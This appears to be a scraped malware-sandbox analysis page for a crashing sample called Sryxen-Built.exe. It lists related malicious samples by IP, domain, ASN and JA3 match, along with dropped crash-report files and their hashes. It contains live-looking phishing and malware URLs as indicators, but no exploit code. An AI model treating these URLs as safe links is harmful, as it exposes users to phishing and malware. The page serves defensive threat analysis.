                                                                                                                                                                                                                                                                            2.22.242.11thUKanu6GD.lnkGet hashmaliciousHTMLPhisher, MalLnkBrowse
                                                                                                                                                                                                                                                                              https://www.flipsnack.com/859EECFF8D6/distribution-agreement/full-view.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  09.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                                                    95.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                                                      SecuriteInfo.com.Trojan.Inject5.17530.4675.11921.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        windows.ps1Get hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                                                                          https://tampopo304-my.sharepoint.com/personal/t_peter_tampopo_co_uk/_layouts/15/guestaccess.aspx?share=ErD6Vn1_jHJCkzNA55SF53AB1bLxHPSyAiXwDO2SC9GB1Q&e=F2hCiyGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                                                                                                                                                                                                                            UPS_ZI100035519.pdf.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                                              https://ncdmv.com/Get hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                                                                                Domains

                                                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                mira-tmc.tm-4.office.comQuotation.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 52.123.243.69
                                                                                                                                                                                                                                                                                                untitled 03-02-2025.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 52.123.243.71
                                                                                                                                                                                                                                                                                                Report Sheet P1-O0783564Q-Ranta Consulting.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 52.123.243.91
                                                                                                                                                                                                                                                                                                Approval Request.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 52.123.243.74
                                                                                                                                                                                                                                                                                                5UnAIdF7m2.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 52.123.243.77
                                                                                                                                                                                                                                                                                                http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                                                                                                • 52.123.243.76
                                                                                                                                                                                                                                                                                                Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                • 52.123.243.176
                                                                                                                                                                                                                                                                                                HzZkjxWF3j.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 52.123.243.184
                                                                                                                                                                                                                                                                                                CMR ART009.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 52.123.251.27
                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                • 52.123.243.177
                                                                                                                                                                                                                                                                                                chrome.cloudflare-dns.comf38186770bffa4a12a7170942b9c0d71ac736142924da24a.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                                                                                                thUKanu6GD.lnkGet hashmaliciousHTMLPhisher, MalLnkBrowse
                                                                                                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                                                ADFoyxP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                                                ADFoyxP.exeGet hashmaliciousKeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                                                desaremix.exeGet hashmaliciousKillMBRBrowse
                                                                                                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                                                                                                https://www.flipsnack.com/859EECFF8D6/distribution-agreement/full-view.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                                                                                                ATTACH - kotak.com.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                                                https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                                                                                                ATTACH - kotak.com.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                                                                                                a416.dscd.akamai.netthUKanu6GD.lnkGet hashmaliciousHTMLPhisher, MalLnkBrowse
                                                                                                                                                                                                                                                                                                • 2.22.242.11
                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                • 2.22.242.105
                                                                                                                                                                                                                                                                                                LtCPevm69G.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Poverty Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                • 2.22.242.105
                                                                                                                                                                                                                                                                                                ADFoyxP.exeGet hashmaliciousKeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                                                                                • 2.22.242.105
                                                                                                                                                                                                                                                                                                https://www.flipsnack.com/859EECFF8D6/distribution-agreement/full-view.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                • 2.22.242.11
                                                                                                                                                                                                                                                                                                https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 2.22.242.11
                                                                                                                                                                                                                                                                                                q3na5Mc.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                • 95.101.54.115
                                                                                                                                                                                                                                                                                                09.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                                                                • 2.22.242.11
                                                                                                                                                                                                                                                                                                95.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                                                                • 2.22.242.11
                                                                                                                                                                                                                                                                                                ESVoO7ywn5.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                • 2.22.242.105
                                                                                                                                                                                                                                                                                                a-0003.a-msedge.netstart.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 204.79.197.203
                                                                                                                                                                                                                                                                                                jki-dragon-release-online-setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 204.79.197.203
                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                • 204.79.197.203
                                                                                                                                                                                                                                                                                                LtCPevm69G.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Poverty Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                • 204.79.197.203
                                                                                                                                                                                                                                                                                                ADFoyxP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 204.79.197.203
                                                                                                                                                                                                                                                                                                ADFoyxP.exeGet hashmaliciousKeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                                                                                • 204.79.197.203
                                                                                                                                                                                                                                                                                                SUPPLY ORDERS 934784.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                                • 204.79.197.203
                                                                                                                                                                                                                                                                                                wecreatedbestthingswithbestwomenforgive.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                                                                                                                                                                                                                • 204.79.197.203
                                                                                                                                                                                                                                                                                                https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 204.79.197.203
                                                                                                                                                                                                                                                                                                yjYJ8QncaF.exeGet hashmaliciousFallen Miner, XmrigBrowse
                                                                                                                                                                                                                                                                                                • 204.79.197.203

                                                                                                                                                                                                                                                                                                ASNs

                                                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                MICROSOFT-CORP-MSN-AS-BLOCKUSrandom.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                                                                                                                                                • 13.92.180.205
                                                                                                                                                                                                                                                                                                sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                • 20.9.165.211
                                                                                                                                                                                                                                                                                                arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                • 22.220.177.215
                                                                                                                                                                                                                                                                                                m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                • 20.116.102.223
                                                                                                                                                                                                                                                                                                mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                • 22.36.149.105
                                                                                                                                                                                                                                                                                                spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                • 20.170.188.24
                                                                                                                                                                                                                                                                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                • 20.198.14.175
                                                                                                                                                                                                                                                                                                ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                • 22.157.162.64
                                                                                                                                                                                                                                                                                                x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                • 20.81.13.225
                                                                                                                                                                                                                                                                                                jklspc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 20.201.157.129
                                                                                                                                                                                                                                                                                                AKAMAI-ASN1EUsh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                • 23.63.69.82
                                                                                                                                                                                                                                                                                                arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                • 23.7.208.86
                                                                                                                                                                                                                                                                                                spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                • 23.197.137.104
                                                                                                                                                                                                                                                                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                • 23.200.79.255
                                                                                                                                                                                                                                                                                                combined.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 23.32.3.56
                                                                                                                                                                                                                                                                                                Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msgGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                                                                • 2.16.238.158
                                                                                                                                                                                                                                                                                                Play_Voicemail_Transcription._(387.KB).svgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                • 95.101.182.112
                                                                                                                                                                                                                                                                                                thUKanu6GD.lnkGet hashmaliciousHTMLPhisher, MalLnkBrowse
                                                                                                                                                                                                                                                                                                • 2.22.242.11
                                                                                                                                                                                                                                                                                                2_DemonstrateExplain.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 2.22.242.139
                                                                                                                                                                                                                                                                                                AyciQgru1X.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                • 2.22.242.82
                                                                                                                                                                                                                                                                                                AKAMAI-ASN1EUsh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                • 23.63.69.82
                                                                                                                                                                                                                                                                                                arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                • 23.7.208.86
                                                                                                                                                                                                                                                                                                spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                • 23.197.137.104
                                                                                                                                                                                                                                                                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                • 23.200.79.255
                                                                                                                                                                                                                                                                                                combined.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 23.32.3.56
                                                                                                                                                                                                                                                                                                Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msgGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                                                                • 2.16.238.158
                                                                                                                                                                                                                                                                                                Play_Voicemail_Transcription._(387.KB).svgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                • 95.101.182.112
                                                                                                                                                                                                                                                                                                thUKanu6GD.lnkGet hashmaliciousHTMLPhisher, MalLnkBrowse
                                                                                                                                                                                                                                                                                                • 2.22.242.11
                                                                                                                                                                                                                                                                                                2_DemonstrateExplain.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 2.22.242.139
                                                                                                                                                                                                                                                                                                AyciQgru1X.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                • 2.22.242.82
                                                                                                                                                                                                                                                                                                AKAMAI-ASN1EUsh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                • 23.63.69.82
                                                                                                                                                                                                                                                                                                arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                • 23.7.208.86
                                                                                                                                                                                                                                                                                                spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                • 23.197.137.104
                                                                                                                                                                                                                                                                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                • 23.200.79.255
                                                                                                                                                                                                                                                                                                combined.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 23.32.3.56
                                                                                                                                                                                                                                                                                                Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msgGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                                                                • 2.16.238.158
                                                                                                                                                                                                                                                                                                Play_Voicemail_Transcription._(387.KB).svgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                • 95.101.182.112
                                                                                                                                                                                                                                                                                                thUKanu6GD.lnkGet hashmaliciousHTMLPhisher, MalLnkBrowse
                                                                                                                                                                                                                                                                                                • 2.22.242.11
                                                                                                                                                                                                                                                                                                2_DemonstrateExplain.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 2.22.242.139
                                                                                                                                                                                                                                                                                                AyciQgru1X.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                • 2.22.242.82

                                                                                                                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                28a2c9bd18a11de089ef85a160da29e4http://uhsee.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 204.79.197.222
                                                                                                                                                                                                                                                                                                Qbffmsv.exeGet hashmaliciousStrela StealerBrowse
                                                                                                                                                                                                                                                                                                • 204.79.197.222
                                                                                                                                                                                                                                                                                                http://www.google.com/url?q=http%3A%2F%2Fbusiness-page-appealdepart-de.vercel.app&sa=D&sntz=1&usg=AOvVaw3y7XLatnyOzQiEGegrNq5uGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 204.79.197.222
                                                                                                                                                                                                                                                                                                SwitchAutoSetup_v0.7.0.3.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                • 204.79.197.222
                                                                                                                                                                                                                                                                                                Rockfon_Vmail_RDRUJND.svgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 204.79.197.222
                                                                                                                                                                                                                                                                                                https://docs.google.com/drawings/d/1xUXBcSQgwpQ-o9JYAXlo15maWwVxBMiXZKHY1_EXu1c/previewGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                • 204.79.197.222
                                                                                                                                                                                                                                                                                                http://insprocks.com/Insprock289.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 204.79.197.222
                                                                                                                                                                                                                                                                                                Magic_V_pro_setup_stable_latest_release_version_9_709.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                                • 204.79.197.222
                                                                                                                                                                                                                                                                                                http://www.texascrafted.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 204.79.197.222
                                                                                                                                                                                                                                                                                                SecuriteInfo.com.Program.Unwanted.5412.9015.527.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                                                                                                • 204.79.197.222

                                                                                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Sryxen-Built.exe_28e8e33f516dbf24ce1ae9136253b7db5186635_18f973e0_cac1299f-d501-4b6c-87e5-13c4c37252f9\Report.wer

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.9185192301259814
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:KusuIoFarmYPz1bs9hHf7yiSKQXIDcQOc6CA5cEXcw3qcl+HbHg/opAnQk3dDDWs:jEmKz1bz0gGsdjij9cAzuiFzZ24lO84
                                                                                                                                                                                                                                                                                                MD5:FD571EFB15EDA5A56EEE3B7EA20F4F5A
                                                                                                                                                                                                                                                                                                SHA1:1E6787E0EE8008ECB0FF1CBAC86AF5FD02E0D360
                                                                                                                                                                                                                                                                                                SHA-256:A2B8444534BCFE1C568FABF03926E8C7CE5E2298CA68211668F684B8767DFC34
                                                                                                                                                                                                                                                                                                SHA-512:40A9DA26335BB2D01C59A620992A68C3D77E30363C2AF3413FB80D51CA0B0F99047E6C4D9C78742B8A1B596982AD1B3815D962297A5233412C0E17659EB8F0FB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.5.9.5.1.0.1.6.4.8.9.7.9.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.5.9.5.1.0.1.7.3.7.9.0.4.8.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.a.c.1.2.9.9.f.-.d.5.0.1.-.4.b.6.c.-.8.7.e.5.-.1.3.c.4.c.3.7.2.5.2.f.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.9.c.e.e.5.5.e.-.8.c.8.9.-.4.6.6.9.-.9.9.b.0.-.2.c.3.1.7.9.0.0.5.f.9.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.S.r.y.x.e.n.-.B.u.i.l.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.b.4.-.0.0.0.1.-.0.0.1.8.-.2.2.6.b.-.d.9.d.e.8.3.9.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.7.0.a.8.7.7.f.9.2.f.b.0.4.1.a.2.9.2.c.8.c.8.f.8.4.f.8.d.d.e.7.0.0.0.0.f.f.f.f.!.0.0.0.0.2.a.d.c.2.6.c.5.d.e.f.b.4.8.1.7.2.4.2.7.0.1.c.3.6.3.2.b.e.b.9.4.a.f.9.d.a.a.5.6.!.S.r.y.x.e.n.-.B.u.i.l.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5././.0.3././.0.

                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER93E6.tmp.dmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Sat Mar 8 23:43:36 2025, 0x1205a4 type
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):133184
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.4997488482998669
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:yz1TmvZlSuhK7f51OzahIYXwDQlz2epXnoWQXoDHOD+KF70bnvOksNNbLg:yIvZlScZehIYc5eZnDUD+KFMnvOVN5
                                                                                                                                                                                                                                                                                                MD5:11D58E53F22719EA4D656FBE4597F602
                                                                                                                                                                                                                                                                                                SHA1:3DE8E41D5A9ED1C2AD2019FF0F61CCF004079691
                                                                                                                                                                                                                                                                                                SHA-256:B01A77986F4EDB172FE2861519D0616BBFD09D5E3CE0183D68B1BECE1E82DA81
                                                                                                                                                                                                                                                                                                SHA-512:48F29458C6374802F7AA5C434EBDD136A0F218323DF3ED879BBC26AB339C46BDA8BFE0840234863E45D6F5EFA1CE19B4093F221E3E2685441EC393AAC97BB515
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MDMP..a..... .......(..g....................................$...,.......d...TN..........`.......8...........T............%..............P...........<...............................................................................eJ..............Lw......................T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER958C.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8838
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6988060140151653
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:R6l7wVeJR8+U6Y6teNl4gmfCOdjZpDr89b/RIf+A1m:R6lXJqr6YAe34gmfCOZg/Of8
                                                                                                                                                                                                                                                                                                MD5:CFE733F692D5005E7EB33E33F944535B
                                                                                                                                                                                                                                                                                                SHA1:75CA9CD350D0E323452A1495173DBB3D50CA4634
                                                                                                                                                                                                                                                                                                SHA-256:5B3840E8A2BE0FB29AC28D7B89845F86BE57F849E3D4E064F102D47FF79342E3
                                                                                                                                                                                                                                                                                                SHA-512:4A94AE6A6F32F9666DA22B6CE55521BE5D9A0C4CE51CE574A4BD9AEA560CF00683C7306B76312C569BD40A96005DA65224334BD93AB491C1A234007A6E0B46D4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.4.8.<./.P.i.

                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER95DC.tmp.xml

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4775
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.454633514942531
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:cvIwWl8zsbJg771I9SicWpW8VYyYm8M4JkRDxYFRuIyq8vrDxVgDpBC0ZF0Rd:uIjf1I70V7VCJkRlYuIWrlVg+0ZF0Rd
                                                                                                                                                                                                                                                                                                MD5:6BD89BABB12462E1E97A50949A9E99FE
                                                                                                                                                                                                                                                                                                SHA1:A029AA23F18528050C41BC6010FC8B186DD7F8BD
                                                                                                                                                                                                                                                                                                SHA-256:2E81405EBCFC32C6EF4A847196618E50EE23CD83333B7DFCF53A601C9A16D7C0
                                                                                                                                                                                                                                                                                                SHA-512:82C4C5307002EC59645D0F7DE62438E040F5FF10AFDA8708759ECD27A7DBCCF41DBB1E928300E08969775C072342DDF5940175D3535BBD76D2DEB55E1C0D8EC7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="752566" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\017e85a5-a2fc-45e2-ab7b-dfa963fcae2f.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8160
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.472622086687383
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:mXqsNk5hUEHfx/T0j5Eih/cIyURLl8Rotoel2tBj2Vvl6NZje9e4WJkhcq1kZUbz:psNwhP/CViRUejxXjegkhkVpS4W
                                                                                                                                                                                                                                                                                                MD5:CF0996D5C93F317BC0C1C442A1EF11E0
                                                                                                                                                                                                                                                                                                SHA1:1C814C8AD336C14D8BAB2CF8D674F56B05B97A36
                                                                                                                                                                                                                                                                                                SHA-256:B2B0273713B2330B897C1DD977AD4B77C639856AF031DE982214187324B68EF6
                                                                                                                                                                                                                                                                                                SHA-512:D2847D3F654BC9EBB49B93C33C139FD353FFABA47144225FD8AF7743BEBB3090C323C2AB6290F7927561CF027C609C73C726D05C9C8BD4F84E482E687A76FAE6
                                                                                                                                                                                                                                                                                                Malicious:false
